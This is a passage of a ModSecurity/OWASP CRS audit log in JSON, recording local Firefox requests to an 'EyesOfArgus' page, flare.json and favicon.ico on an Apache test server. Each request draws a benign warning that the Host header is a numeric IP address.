\"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRc43X8AAQEAABwQSB4AAAAD\"]"],"stopwatch":{"p1":631,"p2":950,"p3":63,"p4":324,"p5":54,"sr":28,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:48:29 --0400","transaction_id":"WRc43X8AAQEAABwQSB8AAAAD","remote_address":"127.0.0.1","remote_port":42692,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","DNT":"1","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:48:27 GMT","ETag":"\"295-54f6a974c6a29\"","Accept-Ranges":"bytes","Content-Length":"661","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc43X8AAQEAABwQSB8AAAAD\"]"],"stopwatch":{"p1":434,"p2":944,"p3":51,"p4":141,"p5":55,"sr":19,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:48:30 --0400","transaction_id":"WRc43n8AAQEAABwQSCAAAAAD","remote_address":"127.0.0.1","remote_port":42692,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc43n8AAQEAABwQSCAAAAAD\"]"],"stopwatch":{"p1":539,"p2":1169,"p3":50,"p4":238,"p5":51,"sr":23,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:48:30 --0400","transaction_id":"WRc43n8AAQEAABwQSCEAAAAD","remote_address":"127.0.0.1","remote_port":42692,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=96","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc43n8AAQEAABwQSCEAAAAD\"]"],"stopwatch":{"p1":416,"p2":1009,"p3":48,"p4":251,"p5":49,"sr":16,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:49:02 --0400","transaction_id":"WRc4-n8AAQEAABwRiHcAAAAE","remote_address":"127.0.0.1","remote_port":42706,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":301,"headers":{"Location":"http://127.0.0.1/EyesOfArgus/","Content-Length":"312","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>301 Moved Permanently</title>\n</head><body>\n<h1>Moved Permanently</h1>\n<p>The document has moved <a href=\"http://127.0.0.1/EyesOfArgus/\">here</a>.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus\"] [unique_id \"WRc4-n8AAQEAABwRiHcAAAAE\"]"],"handler":"httpd/unix-directory","stopwatch":{"p1":872,"p2":1628,"p3":75,"p4":412,"p5":98,"sr":66,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:49:02 --0400","transaction_id":"WRc4-n8AAQEAABwRiHgAAAAE","remote_address":"127.0.0.1","remote_port":42706,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:48:58 GMT","ETag":"\"cca-54f6a992c662d-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1215","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRc4-n8AAQEAABwRiHgAAAAE\"]"],"stopwatch":{"p1":635,"p2":1316,"p3":88,"p4":465,"p5":115,"sr":25,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:49:03 --0400","transaction_id":"WRc4-38AAQEAABwRiHkAAAAE","remote_address":"127.0.0.1","remote_port":42706,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","DNT":"1","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:49:00 GMT","ETag":"\"295-54f6a9943f572\"","Accept-Ranges":"bytes","Content-Length":"661","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc4-38AAQEAABwRiHkAAAAE\"]"],"stopwatch":{"p1":385,"p2":938,"p3":57,"p4":134,"p5":60,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:49:03 --0400","transaction_id":"WRc4-38AAQEAABwRiHoAAAAE","remote_address":"127.0.0.1","remote_port":42706,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc4-38AAQEAABwRiHoAAAAE\"]"],"stopwatch":{"p1":411,"p2":883,"p3":59,"p4":242,"p5":51,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:49:03 --0400","transaction_id":"WRc4-38AAQEAABwRiHsAAAAE","remote_address":"127.0.0.1","remote_port":42706,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=96","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc4-38AAQEAABwRiHsAAAAE\"]"],"stopwatch":{"p1":641,"p2":1445,"p3":333,"p4":433,"p5":52,"sr":33,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:49:43 --0400","transaction_id":"WRc5J38AAQEAABzhe1QAAAAF","remote_address":"127.0.0.1","remote_port":42720,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":301,"headers":{"Location":"http://127.0.0.1/EyesOfArgus/","Content-Length":"312","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>301 Moved Permanently</title>\n</head><body>\n<h1>Moved Permanently</h1>\n<p>The document has moved <a href=\"http://127.0.0.1/EyesOfArgus/\">here</a>.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag 